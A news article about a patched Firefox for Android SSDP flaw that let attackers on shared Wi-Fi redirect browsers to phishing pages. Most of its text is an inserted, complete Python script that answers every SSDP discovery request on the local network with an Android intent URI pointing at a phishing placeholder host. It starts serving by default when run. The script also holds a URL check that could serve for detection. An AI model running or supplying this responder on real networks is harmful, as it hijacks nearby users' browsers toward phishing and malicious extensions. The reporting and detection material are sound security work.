Firefox bug lets you hijack nearby mobile browsers via Wi-Fi


Mozilla has fixed a bug that could be abused to hijack every Firefox for Android browser on the same Wi-Fi network and force its user onto an attacker-chosen site, such as a phishing page.

The bug was discovered by Chris Moberly, an Australian security researcher working for GitLab.

The vulnerability resides in the Firefox SSDP component. SSDP stands for Simple Service Discovery Protocol and is the mechanism through which Firefox finds other devices on the same network to share or receive content with (e.g., casting a video stream to a Roku device).

When Firefox sends out a discovery request, each responding device replies with the location of an XML file where that device's configuration is stored.

However, Moberly discovered that older versions of Firefox did not validate that location before acting on it. An attacker on the same network could answer the discovery request with an Android "intent" URI in place of a real XML address, and Firefox would launch that intent. An intent can be something as ordinary as telling Firefox to open a link, which is enough to send the user to any page the attacker chooses.

Sample exploitation scenario

To better understand how this bug could be weaponized, imagine a scenario where an attacker walks into an airport or mall, connects to the Wi-Fi network, and then launches a script on their laptop that answers every SSDP discovery request on the network with crafted responses.

Any Android user browsing with Firefox during this kind of attack would have their mobile browser hijacked and taken to a malicious site, or prompted to install a malicious Firefox extension, without tapping anything themselves.

Another scenario is an attacker targeting vulnerable Wi-Fi routers. Attackers could use exploits to take over outdated routers, then spam the company's internal network with crafted SSDP responses and force employees to re-authenticate on phishing pages.
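The exchange described above, as an added example that is not Moberly's published proof-of-concept and not Mozilla's code: a responder that answers SSDP M-SEARCH requests with a LOCATION header carrying an Android intent URI, next to the validation a patched client applies before acting on that header. The sample discovery request, the device banner and the `phish.example` host are constructed placeholders; the intent URI follows the standard Android `intent://` format and the `ST` value is assumed.

```python
"""SSDP responder reproducing the Firefox for Android intent bug, plus the
LOCATION check that closes it. Added example, not the original researcher's PoC."""
import socket
import struct
from urllib.parse import urlsplit

SSDP_ADDR = "239.255.255.250"
SSDP_PORT = 1900

# Constructed approximation of the discovery request a Firefox for Android
# instance multicasts when it looks for cast targets (the real ST may differ).
SAMPLE_MSEARCH = (
    "M-SEARCH * HTTP/1.1\r\n"
    "HOST: 239.255.255.250:1900\r\n"
    'MAN: "ssdp:discover"\r\n'
    "MX: 3\r\n"
    "ST: roku:ecp\r\n"
    "\r\n"
)

# Assumed attacker payload: a standard Android intent URI asking the Firefox
# package to open an attacker-controlled page. The host is a placeholder.
MALICIOUS_LOCATION = (
    "intent://phish.example/#Intent;scheme=http;package=org.mozilla.firefox;end"
)


def parse_ssdp(message):
    """Split an SSDP message into its start line and an upper-cased header dict."""
    head = message.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().upper()] = value.strip()
    return lines[0], headers


def build_ssdp_response(location, st):
    """Build an M-SEARCH reply. A real device puts the http:// URL of its
    device-description XML in LOCATION; here the caller picks the value."""
    return (
        "HTTP/1.1 200 OK\r\n"
        "CACHE-CONTROL: max-age=1800\r\n"
        "EXT:\r\n"
        f"LOCATION: {location}\r\n"
        "SERVER: Roku/9.3.0 UPnP/1.0 Roku/9.3.0\r\n"  # constructed banner
        f"ST: {st}\r\n"
        f"USN: uuid:00000000-0000-0000-0000-000000000000::{st}\r\n"
        "\r\n"
    )


def respond_to_msearch(request, location=MALICIOUS_LOCATION):
    """Answer only genuine discovery requests; return None for anything else."""
    start_line, headers = parse_ssdp(request)
    if not start_line.startswith("M-SEARCH") or headers.get("MAN") != '"ssdp:discover"':
        return None
    return build_ssdp_response(location, headers.get("ST", "ssdp:all"))


def is_safe_location(location):
    """The check a patched client applies before acting on LOCATION: only an
    http(s) URL with a host may be fetched as a device description; any other
    scheme (intent://, file://, javascript:) is dropped instead of launched."""
    parts = urlsplit(location)
    return parts.scheme in ("http", "https") and bool(parts.netloc)


def serve(location=MALICIOUS_LOCATION):
    """Join the SSDP multicast group and reply to every M-SEARCH on the LAN."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind(("", SSDP_PORT))
    mreq = struct.pack("4sl", socket.inet_aton(SSDP_ADDR), socket.INADDR_ANY)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
    while True:
        data, peer = sock.recvfrom(4096)
        reply = respond_to_msearch(data.decode("utf-8", "replace"), location)
        if reply:
            sock.sendto(reply.encode(), peer)


if __name__ == "__main__":
    serve()
```

`serve()` is only for a lab network you own; the same `parse_ssdp` and `is_safe_location` pair can be pointed at a packet capture to flag any SSDP reply whose LOCATION is not an http(s) URL, which is the simplest network-side detection for this attack.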

Earlier this week, Moberly published proof-of-concept code that could be used to carry out such attacks. Below are two videos of Moberly and an ESET security researcher demonstrating the attack.
